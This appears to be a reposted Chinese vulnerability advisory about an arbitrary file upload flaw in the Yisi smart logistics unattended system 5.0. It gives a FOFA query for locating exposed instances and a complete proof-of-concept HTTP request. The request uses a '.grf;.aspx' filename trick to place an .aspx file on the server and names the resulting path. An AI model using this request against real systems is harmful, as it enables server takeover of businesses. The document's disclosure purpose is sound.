易思智能物流无人值守系统5.0存在任意文件上传漏洞 附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 易思智能物流无人值守系统5.0简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。

2.漏洞描述

智能物流无人值守是针对流程生产企业原料采购、产成品销售及厂内物流的统一管控智能信息化平台。 目的:全企业产供销业务的集成管理,无人值守计量、降本增效、机器替代人工，优化物流资源管控体系。该系统存在任意文件上传漏洞。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

易思智能物流无人值守系统5.0

4.fofa查询语句

"智能物流无人值守系统"

5.漏洞复现

漏洞链接：http://127.0.0.1/Sys_ReportFile/ImportReport?encode=717132

漏洞数据包：

POST /Sys_ReportFile/ImportReport?encode=717132 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 199
Content-Type: multipart/form-data; boundary=59d3d0b126080d21572c9e7a77d89931

--59d3d0b126080d21572c9e7a77d89931
Content-Disposition: form-data; name="file"; filename="1234.grf;.aspx"
Content-Type: application/octet-stream
304674859
--59d3d0b126080d21572c9e7a77d89931--

上传成功后，会返回路径 http://127.0.0.1/GRF/Custom/717132.aspx

原文始发于微信公众号（南风漏洞复现文库）：易思智能物流无人值守系统5.0存在任意文件上传漏洞 附POC